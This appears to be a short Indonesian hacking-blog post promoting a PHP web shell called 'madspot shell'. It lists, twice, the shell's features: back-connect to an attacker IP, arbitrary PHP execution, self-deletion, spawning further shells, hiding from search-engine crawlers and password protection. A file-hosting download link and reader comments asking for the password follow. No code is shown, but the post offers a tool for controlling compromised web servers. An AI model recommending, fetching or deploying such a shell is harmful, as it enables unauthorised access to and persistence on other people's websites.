Features :
1. kill => Delete the shell
2. madshell => Create madspot shell in same directory madshell.php
3. bc 127.127.127 => bc command is use to connect back to ip
4. run => run is use to run php run md5( 'mad' );
5. exit => exit is use to logout
6. cls => clear the screen
MAD commands :
1. MadLeeTs
2. H4x0rL1f3
3. 1337
- Anti google bot or other crawaler
- user password protected
- Command line
1. kill => Delete the shell
2. madshell => Create madspot shell in same directory madshell.php
3. bc 127.127.127 => bc command is use to connect back to ip
4. run => run is use to run php run md5( 'mad' );
5. exit => exit is use to logout
6. cls => clear the screen
MAD commands :
1. MadLeeTs
2. H4x0rL1f3
3. 1337
Download : http://www.mediafire.com/?vquyyo741yjhc7p
proteksi buat ape ini min, masih bingung saya
BalasHapusvisit Hosting Palembang
apa passwordnya min?